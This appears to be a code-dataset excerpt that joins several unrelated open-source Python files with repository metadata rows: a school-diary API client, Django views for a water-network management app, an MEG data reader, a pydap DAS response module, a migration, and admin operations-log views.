self.gender = user_info["result"]["gender"]
self.school = user_info["result"]["relations"]["schools"][0]["title"]
def __str__(self):
text = ""
text += "\nИмя: " + self.name
text += "\nКласс: " + str(self.grade)
text += "\nГород: " + self.city
text += "\nШкола: " + self.school
text += "\nПол: " + "Мужской" if self.gender == "male" else "Женский"
text += "\nЛогин: " + self.login
text += "\nЭл. Почта: " + self.email
return text
def get_schedule(self, date=None, silent=False):
load_spinner = None
if not silent:
load_spinner = yaspin(text="Загрузка...")
load_spinner.text = "[Получение дневника из журнала...]"
if date is None:
date = "20191118-20191124"
diary = rq.get(
API_URL + "getschedule",
params={
"devkey": DEVKEY,
"vendor": VENDOR,
"out_format": "json",
"student": self.student_id,
"auth_token": self.token,
"days": date,
"rings": "true"
}
).json()['response']
if diary["error"] is not None:
if not silent:
load_spinner.text = ""
load_spinner.fail(stylize("Ошибка получения расписания: " + diary["error"], fg("red")))
raise LookupError(diary["error"])
schedule = diary['result']['students'][str(self.student_id)]
if not silent:
load_spinner.text = ""
load_spinner.ok(stylize("[Расписание успешно получено!] ", fg("green")))
return schedule
# Получение информации об ученике через запрос getrules
def info(self, extended=False):
if not extended:
return self.student_id, self.name, self.grade
else:
return {
"student_id": self.student_id,
"fullname": self.name,
"grade": self.grade,
"city": self.city,
"email": self.email,
"gender": self.gender,
"school": self.school
}
| 32.503268 | 103 | 0.48703 | [
"MIT"
] | yakuri354/EljurCLI | eljur.py | 5,600 | Python |
from datetime import date
from dateutil.relativedelta import relativedelta
from django.contrib.auth.models import Group
from django.contrib.gis.geos import GEOSGeometry
from django.core.mail import send_mail
from ..api.get_table import *
from ..utils.get_data import has_access, is_int, is_float
from ..water_network.models import ElementType
def log_element(elem, request):
transaction = Transaction(user=request.user)
transaction.save()
elem.save()
elem.log_add(transaction)
def add_consumer_element(request):
first_name = request.POST.get("firstname", None)
last_name = request.POST.get("lastname", None)
gender = request.POST.get("gender", None)
address = request.POST.get("address", None)
sub = request.POST.get("subconsumer", None)
phone = request.POST.get("phone", None)
outlet_id = request.POST.get("mainOutlet", None)
if sub is None or not is_int(sub):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
outlet = Element.objects.filter(id=outlet_id).first()
if outlet is None:
return HttpResponse("La sortie d'eau spécifiée n'a pas été trouvée, "
"impossible d'ajouter le consommateur", status=400)
if not has_access(outlet, request):
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
consumer = Consumer(last_name=last_name, first_name=first_name, gender=gender, location=address,
phone_number=phone, household_size=sub, water_outlet=outlet) # Creation
log_element(consumer, request)
if outlet.type != ElementType.INDIVIDUAL.name:
price, duration = outlet.get_price_and_duration()
creation = date.today()
expiration = creation + relativedelta(months=duration)
invoice = Invoice(consumer=consumer, water_outlet=outlet, amount=price,
creation=creation, expiration=expiration)
invoice.save()
json_object = {
'data': consumer.descript(),
'type': 'add',
'table': 'consumer'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_network_element(request):
if request.user.profile.zone is None:
return HttpResponse("Vous n'êtes pas connecté en tant que gestionnaire de zone", status=403)
type = request.POST.get("type", None).upper()
loc = request.POST.get("localization", None)
state = request.POST.get("state", None).upper()
name = ElementType[type].value + " " + loc
zone = Zone.objects.filter(name=request.user.profile.zone).first()
if zone is None:
return HttpResponse("Impossible de trouver la zone gérée pas l'utilisateur", status=400)
element = Element(name=name, type=type, status=state, location=loc, zone=zone) # Creation
log_element(element, request)
json_object = {
'data': element.network_descript(),
'type': 'add',
'table': 'water_element'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_report_element(request):
values = json.loads(request.body.decode("utf-8"))
for index, elem in enumerate(values["selectedOutlets"]):
outlet = Element.objects.filter(id=elem).first()
if outlet is None:
return HttpResponse("La sortie d'eau concernée par ce rapport n'a pas été trouvée", status=400)
if not has_access(outlet, request):
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
active = values["isActive"]
if active:
hour_activity = values["inputHours"]
day_activity = values["inputDays"]
if not is_int(hour_activity) or not is_int(day_activity):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
data = values["details"][index]["perCubic"] != "none"
if data:
meters_distr = values["details"][index]["cubic"]
value_meter = values["details"][index]["perCubic"]
recette = values["details"][index]["bill"]
if not is_float(meters_distr) or not is_float(value_meter) or not is_float(recette):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
report_line = Report(water_outlet=outlet, was_active=active, has_data=data,
hours_active=hour_activity, days_active=day_activity,
quantity_distributed=meters_distr, price=value_meter, recette=recette)
if outlet.type == ElementType.INDIVIDUAL.name: # Create an invoice for individual outlets
consumer = Consumer.objects.filter(water_outlet=outlet).first()
if consumer is not None:
amount = int(meters_distr) * int(value_meter)
creation = date.today()
expiration = creation + relativedelta(months=1)
invoice = Invoice(consumer=consumer, water_outlet=outlet, creation=creation,
expiration=expiration, amount=amount)
invoice.save()
else:
report_line = Report(water_outlet=outlet, was_active=active, has_data=data,
hours_active=hour_activity, days_active=day_activity)
if outlet.type == ElementType.INDIVIDUAL.name:
consumer = Consumer.objects.filter(water_outlet=outlet).first()
if consumer is not None:
amount = outlet.zone.indiv_base_price
creation = date.today()
expiration = creation + relativedelta(months=1)
invoice = Invoice(consumer=consumer, water_outlet=outlet, creation=creation,
expiration=expiration, amount=amount)
invoice.save()
else:
report_line = Report(water_outlet=outlet, was_active=active)
log_element(report_line, request)
return HttpResponse(status=200)
def add_zone_element(request):
if request.user.profile.zone is None:
return HttpResponse("Vous n'êtes pas connecté en tant que gestionnaire de zone", status=403)
name = request.POST.get("name", None)
fountain_price = request.POST.get("fountain-price", 0)
fountain_duration = request.POST.get("fountain-duration", 1)
kiosk_price = request.POST.get("kiosk-price", 0)
kiosk_duration = request.POST.get("kiosk-duration", 1)
indiv_base_price = request.POST.get("indiv-price", 0)
if not is_int(fountain_price) or not is_int(fountain_duration) \
or not is_int(kiosk_price) or not is_int(kiosk_duration) \
or not is_int(indiv_base_price):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
if Zone.objects.filter(name=name).first() is not None:
return HttpResponse("Une zone avec ce nom existe déjà dans l'application, "
"veuillez en choisir un autre", status=400)
superzone = Zone.objects.filter(name=request.user.profile.zone).first()
if superzone is None:
return HttpResponse("Impossible de trouver la zone gérée pas l'utilisateur", status=400)
zone = Zone(name=name, superzone=superzone, subzones=[name],
fountain_price=fountain_price, fountain_duration=fountain_duration,
kiosk_price=kiosk_price, kiosk_duration=kiosk_duration,
indiv_base_price=indiv_base_price)
while superzone is not None:
superzone.subzones.append(name)
superzone.save()
superzone = superzone.superzone
log_element(zone, request)
json_object = {
'data': zone.descript(),
'type': 'add',
'table': 'zone'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_collaborator_element(request):
if request.user.profile.zone is None:
return HttpResponse("Vous n'êtes pas connecté en tant que gestionnaire de zone", status=403)
first_name = request.POST.get("firstname", None)
last_name = request.POST.get("lastname", None)
username = request.POST.get("id", None)
password = User.objects.make_random_password() # New random password
email = request.POST.get("email", None)
type = request.POST.get("type", None)
phone = request.POST.get("phone", None)
if User.objects.filter(username=username).first() is not None:
return HttpResponse("Cet utilisateur existe déjà ! Vérifier que son identifiant est bien unique", status=400)
user = User.objects.create_user(username=username, email=email, password=password,
first_name=first_name, last_name=last_name)
user.profile.phone_number = phone
if type == "fountain-manager":
outlet_ids = request.POST.get("outlets", None).split(',')
if len(outlet_ids) < 1:
user.delete()
return HttpResponse("Vous n'avez pas choisi de fontaine a attribuer !", status=400)
outlets = Element.objects.filter(id__in=outlet_ids) if len(outlet_ids) > 1 else \
Element.objects.filter(id=outlet_ids[0])
if len(outlets) < 1:
user.delete()
return HttpResponse("Impossible d'attribuer cette fontaine au gestionnaire", status=400)
for outlet in outlets:
if not has_access(outlet, request):
user.delete()
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
outlet.manager_names = outlet.get_managers()
outlet.save()
user.profile.outlets.append(outlet.id)
my_group = Group.objects.get(name='Gestionnaire de fontaine')
my_group.user_set.add(user)
tab = [user.username, user.last_name, user.first_name, user.profile.get_phone_number(),
user.email, "Gestionnaire de fontaine", user.profile.get_zone(), user.profile.outlets]
elif type == "zone-manager":
zone_id = request.POST.get("zone", None)
zone = Zone.objects.filter(id=zone_id).first()
if zone is None:
user.delete()
return HttpResponse("Impossible d'attribuer cette zone au gestionnaire", status=400)
if zone.name not in request.user.profile.zone.subzones:
user.delete()
return HttpResponse("Vous n'avez pas les droits sur cette zone", status=403)
user.profile.zone = zone
my_group = Group.objects.get(name='Gestionnaire de zone')
my_group.user_set.add(user)
tab = [user.username, user.last_name, user.first_name, user.profile.get_phone_number(),
user.email, "Gestionnaire de zone", user.profile.zone.name, user.profile.outlets]
else:
user.delete()
return HttpResponse("Impossible d'ajouter l'utilisateur", status=400)
send_mail('Bienvenue sur haitiwater !',
'Bienvenue sur haitiwater. Voici votre mot de passe autogénéré : ' + password + '\n' +
'Veuillez vous connecter pour le modifier.\n' +
'Pour rappel, votre identifiant est : ' + username,
'', [email], fail_silently=False)
log_element(user.profile, request)
json_object = {
'data': tab,
'type': 'add',
'table': 'manager'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_ticket_element(request):
outlet_id = request.POST.get("id_outlet", None)
type = request.POST.get("type", None).upper()
comment = request.POST.get("comment", None)
urgency = request.POST.get('urgency', None).upper()
image = request.FILES.get("picture", None)
outlet = Element.objects.filter(id=outlet_id).first()
if outlet is None:
return HttpResponse("Impossible de trouver la sortie d'eau correspondante au ticket", status=400)
if not has_access(outlet, request):
return HttpResponse("Vous n'avez pas les droits sur cet élément de réseau", status=403)
if image:
import uuid
extension = image.name.split(".")
filename = str(uuid.uuid4())
image.name = filename + "." + extension[1]
ticket = Ticket(water_outlet=outlet, type=type, comment=comment, urgency=urgency, image=image)
log_element(ticket, request)
json_object = {
'data': ticket.descript(),
'type': 'add',
'table': 'ticket'
}
return HttpResponse(json.dumps(json_object), status=200)
def add_payment_element(request):
id_consumer = request.POST.get("id_consumer", None)
amount = request.POST.get("amount", None)
if not is_float(amount):
return HttpResponse("Impossible, certains champs devraient être des entiers", status=400)
consumer = Consumer.objects.filter(id=id_consumer).first()
if not consumer:
return HttpResponse("Impossible de trouver l'utilisateur", status=400)
elif not has_access(consumer.water_outlet, request):
return HttpResponse("Vous n'avez pas les droits sur ce consommateur", status=403)
outlet = consumer.water_outlet
payment = Payment(consumer=consumer, water_outlet=outlet, amount=amount)
log_element(payment, request)
json_object = {
'data': payment.descript(),
'type': 'add',
'table': 'payment',
'consumer': payment.infos()["Identifiant consommateur"]
}
return HttpResponse(json.dumps(json_object), status=200)
def add_location_element(request, elem):
body = request.body.decode('utf-8')
json_value = json.loads(body)
poly = GEOSGeometry(str(json_value["geometry"]))
lon, lat = 0, 0
if len(poly.coord_seq) == 1:
lon, lat = poly[0], poly[1]
loc = Location(elem=elem, lat=lat, lon=lon, poly=poly, json_representation=body)
log_element(loc, request)
json_object = {
'data': [loc.elem.name, loc.json_representation],
'type': 'add',
'id': loc.elem.id,
'table': 'water_element_details'
}
return HttpResponse(json.dumps(json_object), status=200)
| 39.714681 | 117 | 0.645812 | [
"MIT"
] | exavince/HaitiWater | code/haitiwater/apps/api/add_table.py | 14,381 | Python |
from datasets.data import documents,data
for doc in documents.find():
print(doc['admitted']) | 24.25 | 40 | 0.742268 | [
"MIT"
] | pmwaniki/ppg-analysis | datasets/descriptives.py | 97 | Python |
# Author: Luke Bloy <[email protected]>
#
# License: BSD (3-clause)
import numpy as np
import os.path as op
import datetime
import calendar
from .utils import _load_mne_locs
from ...utils import logger, warn
from ..utils import _read_segments_file
from ..base import BaseRaw
from ..meas_info import _empty_info
from ..constants import FIFF
def read_raw_artemis123(input_fname, preload=False, verbose=None):
"""Read Artemis123 data as raw object.
Parameters
----------
input_fname : str
Path to the data file (extension ``.bin``). The header file with the
same file name stem and an extension ``.txt`` is expected to be found
in the same directory.
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
raw : Instance of Raw
A Raw object containing the data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawArtemis123(input_fname, preload=preload, verbose=verbose)
def _get_artemis123_info(fname):
"""Function for extracting info from artemis123 header files."""
fname = op.splitext(op.abspath(fname))[0]
header = fname + '.txt'
logger.info('Reading header...')
# key names for artemis channel info...
chan_keys = ['name', 'scaling', 'FLL_Gain', 'FLL_Mode', 'FLL_HighPass',
'FLL_AutoReset', 'FLL_ResetLock']
header_info = dict()
header_info['filter_hist'] = []
header_info['comments'] = ''
header_info['channels'] = []
with open(header, 'r') as fid:
# section flag
# 0 - None
# 1 - main header
# 2 - channel header
# 3 - comments
# 4 - length
# 5 - filtering History
sectionFlag = 0
for line in fid:
# skip emptylines or header line for channel info
if ((not line.strip()) or
(sectionFlag == 2 and line.startswith('DAQ Map'))):
continue
# set sectionFlag
if line.startswith('<end'):
sectionFlag = 0
elif line.startswith("<start main header>"):
sectionFlag = 1
elif line.startswith("<start per channel header>"):
sectionFlag = 2
elif line.startswith("<start comments>"):
sectionFlag = 3
elif line.startswith("<start length>"):
sectionFlag = 4
elif line.startswith("<start filtering history>"):
sectionFlag = 5
else:
# parse header info lines
# part of main header - lines are name value pairs
if sectionFlag == 1:
values = line.strip().split('\t')
if len(values) == 1:
values.append('')
header_info[values[0]] = values[1]
# part of channel header - lines are Channel Info
elif sectionFlag == 2:
values = line.strip().split('\t')
if len(values) != 7:
raise IOError('Error parsing line \n\t:%s\n' % line +
'from file %s' % header)
tmp = dict()
for k, v in zip(chan_keys, values):
tmp[k] = v
header_info['channels'].append(tmp)
elif sectionFlag == 3:
header_info['comments'] = '%s%s' \
% (header_info['comments'], line.strip())
elif sectionFlag == 4:
header_info['num_samples'] = int(line.strip())
elif sectionFlag == 5:
header_info['filter_hist'].append(line.strip())
for k in ['Temporal Filter Active?', 'Decimation Active?',
'Spatial Filter Active?']:
if(header_info[k] != 'FALSE'):
warn('%s - set to but is not supported' % k)
if(header_info['filter_hist']):
warn('Non-Empty Filter histroy found, BUT is not supported' % k)
# build mne info struct
info = _empty_info(float(header_info['Rate Out']))
# Attempt to get time/date from fname
# Artemis123 files saved from the scanner observe the following
# naming convention 'Artemis_Data_YYYY-MM-DD-HHh-MMm_[chosen by user].bin'
try:
date = datetime.datetime.strptime(
op.basename(fname).split('_')[2], '%Y-%m-%d-%Hh-%Mm')
meas_date = calendar.timegm(date.utctimetuple())
except Exception:
meas_date = None
# build subject info
subject_info = {'id': header_info['Subject ID']}
# build description
desc = ''
for k in ['Purpose', 'Notes']:
desc += '{} : {}\n'.format(k, header_info[k])
desc += 'Comments : {}'.format(header_info['comments'])
info = _empty_info(float(header_info['Rate Out']))
info.update({'filename': fname, 'meas_date': meas_date,
'description': desc, 'buffer_size_sec': 1.,
'subject_info': subject_info,
'proj_name': header_info['Project Name']})
# Channel Names by type
ref_mag_names = ['REF_001', 'REF_002', 'REF_003',
'REF_004', 'REF_005', 'REF_006']
ref_grad_names = ['REF_007', 'REF_008', 'REF_009',
'REF_010', 'REF_011', 'REF_012']
# load mne loc dictionary
loc_dict = _load_mne_locs()
info['chs'] = []
info['bads'] = []
for i, chan in enumerate(header_info['channels']):
# build chs struct
t = {'cal': float(chan['scaling']), 'ch_name': chan['name'],
'logno': i + 1, 'scanno': i + 1, 'range': 1.0,
'unit_mul': FIFF.FIFF_UNITM_NONE,
'coord_frame': FIFF.FIFFV_COORD_DEVICE}
t['loc'] = loc_dict.get(chan['name'], np.zeros(12))
if (chan['name'].startswith('MEG')):
t['coil_type'] = FIFF.FIFFV_COIL_ARTEMIS123_GRAD
t['kind'] = FIFF.FIFFV_MEG_CH
# While gradiometer units are T/m, the meg sensors referred to as
# gradiometers report the field difference between 2 pick-up coils.
# Therefore the units of the measurements should be T
# *AND* the baseline (difference between pickup coils)
# should not be used in leadfield / forwardfield computations.
t['unit'] = FIFF.FIFF_UNIT_T
t['unit_mul'] = FIFF.FIFF_UNITM_F
# 3 axis referance magnetometers
elif (chan['name'] in ref_mag_names):
t['coil_type'] = FIFF.FIFFV_COIL_ARTEMIS123_REF_MAG
t['kind'] = FIFF.FIFFV_REF_MEG_CH
t['unit'] = FIFF.FIFF_UNIT_T
t['unit_mul'] = FIFF.FIFF_UNITM_F
# reference gradiometers
elif (chan['name'] in ref_grad_names):
t['coil_type'] = FIFF.FIFFV_COIL_ARTEMIS123_REF_GRAD
t['kind'] = FIFF.FIFFV_REF_MEG_CH
# While gradiometer units are T/m, the meg sensors referred to as
# gradiometers report the field difference between 2 pick-up coils.
# Therefore the units of the measurements should be T
# *AND* the baseline (difference between pickup coils)
# should not be used in leadfield / forwardfield computations.
t['unit'] = FIFF.FIFF_UNIT_T
t['unit_mul'] = FIFF.FIFF_UNITM_F
# other reference channels are unplugged and should be ignored.
elif (chan['name'].startswith('REF')):
t['coil_type'] = FIFF.FIFFV_COIL_NONE
t['kind'] = FIFF.FIFFV_MISC_CH
t['unit'] = FIFF.FIFF_UNIT_V
info['bads'].append(t['ch_name'])
elif (chan['name'].startswith(('AUX', 'TRG', 'MIO'))):
t['coil_type'] = FIFF.FIFFV_COIL_NONE
t['unit'] = FIFF.FIFF_UNIT_V
if (chan['name'].startswith('TRG')):
t['kind'] = FIFF.FIFFV_STIM_CH
else:
t['kind'] = FIFF.FIFFV_MISC_CH
else:
raise ValueError('Channel does not match expected' +
' channel Types:"%s"' % chan['name'])
# incorporate mulitplier (unit_mul) into calibration
t['cal'] *= 10 ** t['unit_mul']
t['unit_mul'] = FIFF.FIFF_UNITM_NONE
# append this channel to the info
info['chs'].append(t)
if (chan['FLL_ResetLock'] == 'TRUE'):
info['bads'].append(t['ch_name'])
# reduce info['bads'] to unique set
info['bads'] = list(set(info['bads']))
info._update_redundant()
return info, header_info
class RawArtemis123(BaseRaw):
"""Raw object from Artemis123 file.
Parameters
----------
input_fname : str
Path to the Artemis123 data file (ending in ``'.bin'``).
preload : bool or str (default False)
Preload data into memory for data manipulation and faster indexing.
If True, the data will be preloaded into memory (fast, requires
large amount of memory). If preload is a string, preload is the
file name of a memory-mapped file which is used to store the data
on the hard drive (slower, requires less memory).
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
def __init__(self, input_fname, preload=False, verbose=None): # noqa: D102
info, header_info = _get_artemis123_info(input_fname)
last_samps = [header_info['num_samples'] - 1]
super(RawArtemis123, self).__init__(
info, preload, filenames=[input_fname], raw_extras=[header_info],
last_samps=last_samps, orig_format=np.float32,
verbose=verbose)
def _read_segment_file(self, data, idx, fi, start, stop, cals, mult):
"""Read a chunk of raw data."""
_read_segments_file(self, data, idx, fi, start,
stop, cals, mult, dtype='>f4')
| 38.933086 | 79 | 0.575862 | [
"BSD-3-Clause"
] | mvdoc/mne-python | mne/io/artemis123/artemis123.py | 10,473 | Python |
"""The DAS response.
The DAS response describes the attributes associated with a dataset and its
variables. Together with the DDS the DAS response completely describes the
metadata of a dataset, allowing it to be introspected and data to be
downloaded.
"""
try:
from functools import singledispatch
except ImportError:
from singledispatch import singledispatch
from collections import Iterable
from six import string_types, integer_types
from six.moves import map
import numpy as np
from ..model import (DatasetType, BaseType,
StructureType, SequenceType,
GridType)
from ..lib import encode, quote, __version__, NUMPY_TO_DAP2_TYPEMAP
from .lib import BaseResponse
INDENT = ' ' * 4
class DASResponse(BaseResponse):
"""The DAS response."""
__version__ = __version__
def __init__(self, dataset):
BaseResponse.__init__(self, dataset)
self.headers.extend([
('Content-description', 'dods_das'),
('Content-type', 'text/plain; charset=ascii'),
])
def __iter__(self):
for line in das(self.dataset):
try:
yield line.encode('ascii')
except UnicodeDecodeError:
yield line.encode('UTF-8')
@singledispatch
def das(var, level=0):
"""Single dispatcher that generates the DAS response."""
raise StopIteration
@das.register(DatasetType)
def _datasettype(var, level=0):
yield '{indent}Attributes {{\n'.format(indent=level*INDENT)
for attr in sorted(var.attributes.keys()):
values = var.attributes[attr]
for line in build_attributes(attr, values, level+1):
yield line
for child in var.children():
for line in das(child, level=level+1):
yield line
yield '{indent}}}\n'.format(indent=level*INDENT)
@das.register(StructureType)
@das.register(SequenceType)
def _structuretype(var, level=0):
yield '{indent}{name} {{\n'.format(indent=level*INDENT, name=var.name)
for attr in sorted(var.attributes.keys()):
values = var.attributes[attr]
for line in build_attributes(attr, values, level+1):
yield line
for child in var.children():
for line in das(child, level=level+1):
yield line
yield '{indent}}}\n'.format(indent=level*INDENT)
@das.register(BaseType)
@das.register(GridType)
def _basetypegridtype(var, level=0):
yield '{indent}{name} {{\n'.format(indent=level*INDENT, name=var.name)
for attr in sorted(var.attributes.keys()):
values = var.attributes[attr]
if np.asarray(values).size > 0:
for line in build_attributes(attr, values, level+1):
yield line
yield '{indent}}}\n'.format(indent=level*INDENT)
def build_attributes(attr, values, level=0):
"""Recursive function to build the DAS."""
# check for metadata
if isinstance(values, dict):
yield '{indent}{attr} {{\n'.format(indent=(level)*INDENT, attr=attr)
for k, v in values.items():
for line in build_attributes(k, v, level+1):
yield line
yield '{indent}}}\n'.format(indent=(level)*INDENT)
else:
# get type
type = get_type(values)
# encode values
if (isinstance(values, string_types) or
not isinstance(values, Iterable) or
getattr(values, 'shape', None) == ()):
values = [encode(values)]
else:
values = map(encode, values)
yield '{indent}{type} {attr} {values};\n'.format(
indent=(level)*INDENT,
type=type,
attr=quote(attr),
values=', '.join(values))
def get_type(values):
"""Extract the type of a variable.
This function tries to determine the DAP type of a Python variable using
several methods. Returns the DAP type as a string.
"""
if hasattr(values, 'dtype'):
return NUMPY_TO_DAP2_TYPEMAP[values.dtype.char]
elif isinstance(values, string_types) or not isinstance(values, Iterable):
return type_convert(values)
else:
# if there are several values, they may have different types, so we
# need to convert all of them and use a precedence table
types = [type_convert(val) for val in values]
precedence = ['String', 'Float64', 'Int32']
types.sort(key=precedence.index)
return types[0]
def type_convert(obj):
"""Map Python objects to the corresponding Opendap types.
Returns the DAP representation of the type as a string.
"""
if isinstance(obj, float):
return 'Float64'
elif isinstance(obj, integer_types):
return 'Int32'
else:
return 'String'
| 29.216049 | 78 | 0.637439 | [
"MIT"
] | JohnMLarkin/pydap | src/pydap/responses/das.py | 4,733 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-11-11 04:06
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='SignedTermsAndConditions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='TermsAndConditions',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.DateField(auto_now_add=True, help_text='Date of publication', verbose_name='Creation date')),
('markdown', models.TextField(editable=False, help_text='Formatted in Markdown', verbose_name='Terms and conditions)')),
],
),
migrations.AddField(
model_name='signedtermsandconditions',
name='terms',
field=models.ForeignKey(help_text='Terms agreed with user', on_delete=django.db.models.deletion.CASCADE, to='terms.TermsAndConditions'),
),
migrations.AddField(
model_name='signedtermsandconditions',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
| 37.136364 | 148 | 0.639535 | [
"MIT"
] | niwo/seven23_server | seven23/models/terms/migrations/0001_initial.py | 1,634 | Python |
# pypi
from pyramid.httpexceptions import HTTPFound
from pyramid.view import view_config
# local
from ..lib.handler import Handler
from ...lib import db as lib_db
from ...lib import errors
from ...model import utils as model_utils
# ==============================================================================
class ViewAdminOperations(Handler):
def _parse__event_type(self):
event_type = self.request.params.get("event_type", None)
event_type_id = None
if event_type:
try:
event_type_id = model_utils.OperationsEventType.from_string(event_type)
except AttributeError:
event_type = None
return (event_type, event_type_id)
def _parse__event_type_ids(self):
"""turns the request's `event_type=operations__update_recents__global` into an id."""
event_type_id = None
event_type = self.request.params.get("event_type", None)
if event_type:
try:
event_type_id = model_utils.OperationsEventType.from_string(event_type)
except AttributeError:
event_type = None
event_type_id = None
if event_type_id:
return (event_type_id,)
return None
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(route_name="admin:operations", renderer=None)
def operations(self):
return HTTPFound(
"%s/operations/log"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:log", renderer="/admin/operations-log.mako"
)
@view_config(
route_name="admin:operations:log_paginated",
renderer="/admin/operations-log.mako",
)
def operations_log(self):
_items_per_page = 25
(event_type, event_type_id) = self._parse__event_type()
event_type_ids = (event_type_id,) if event_type_id else None
items_count = lib_db.get.get__OperationsEvent__count(
self.request.api_context, event_type_ids=event_type_ids
)
_url_template = (
"%s/operations/log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
if event_type:
_url_template = "%s/operations/log/{0}?event_type=%s" % (
self.request.registry.settings["app_settings"]["admin_prefix"],
event_type,
)
(pager, offset) = self._paginate(
items_count, url_template=_url_template, items_per_page=_items_per_page
)
items_paged = lib_db.get.get__OperationsEvent__paginated(
self.request.api_context,
event_type_ids=event_type_ids,
limit=_items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"OperationsEvent__count": items_count,
"OperationsEvents": items_paged,
"pager": pager,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
"event_type": event_type,
}
@view_config(
route_name="admin:operations:log:focus",
renderer="/admin/operations-log-focus.mako",
)
def operations_log_focus(self):
item = lib_db.get.get__OperationsEvent__by_id(
self.request.api_context, self.request.matchdict["id"], eagerload_log=True
)
if not item:
raise ValueError("no item")
return {
"project": "peter_sslers",
"OperationsEvent": item,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:redis", renderer="/admin/operations-redis.mako"
)
@view_config(
route_name="admin:operations:redis_paginated",
renderer="/admin/operations-redis.mako",
)
def admin_redis(self):
try:
# could raise `lib.errors.InvalidRequest`
# is this needed for viewing logs though?
# self._ensure_redis()
_items_per_page = 25
items_count = lib_db.get.get__OperationsEvent__count(
self.request.api_context,
event_type_ids=(
model_utils.OperationsEventType.from_string(
"operations__redis_prime"
),
),
)
url_template = (
"%s/operations/redis/log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
(pager, offset) = self._paginate(
items_count,
url_template=url_template,
items_per_page=_items_per_page,
)
items_paged = lib_db.get.get__OperationsEvent__paginated(
self.request.api_context,
event_type_ids=(
model_utils.OperationsEventType.from_string(
"operations__redis_prime"
),
),
limit=_items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"OperationsEvent__count": items_count,
"OperationsEvents": items_paged,
"pager": pager,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
}
except errors.InvalidRequest as exc:
if self.request.wants_json:
return {
"result": "error",
"error": exc.args[0],
}
raise HTTPFound(
"%s?result=error&error=%s"
% (
self.request.registry.settings["app_settings"]["admin_prefix"],
exc.as_querystring,
)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:nginx", renderer="/admin/operations-nginx.mako"
)
@view_config(
route_name="admin:operations:nginx_paginated",
renderer="/admin/operations-nginx.mako",
)
def admin_nginx(self):
try:
# could raise `lib.errors.InvalidRequest`
# is this needed for viewing logs though?
# self._ensure_nginx()
_items_per_page = 25
_event_type_ids = (
model_utils.OperationsEventType.from_string(
"operations__nginx_cache_expire"
),
model_utils.OperationsEventType.from_string(
"operations__nginx_cache_flush"
),
)
items_count = lib_db.get.get__OperationsEvent__count(
self.request.api_context, event_type_ids=_event_type_ids
)
url_template = (
"%s/operations/nginx/log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
(pager, offset) = self._paginate(
items_count,
url_template=url_template,
items_per_page=_items_per_page,
)
items_paged = lib_db.get.get__OperationsEvent__paginated(
self.request.api_context,
event_type_ids=_event_type_ids,
limit=_items_per_page,
offset=offset,
)
return {
"project": "peter_sslers",
"OperationsEvent__count": items_count,
"OperationsEvents": items_paged,
"pager": pager,
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
except errors.InvalidRequest as exc:
if self.request.wants_json:
return {
"result": "error",
"error": exc.args[0],
}
raise HTTPFound(
"%s/?result=error&&error=%s"
% (
self.request.registry.settings["app_settings"]["admin_prefix"],
exc.as_querystring,
)
)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
@view_config(
route_name="admin:operations:object_log",
renderer="/admin/operations-object_log.mako",
)
@view_config(
route_name="admin:operations:object_log_paginated",
renderer="/admin/operations-object_log.mako",
)
def object_log(self):
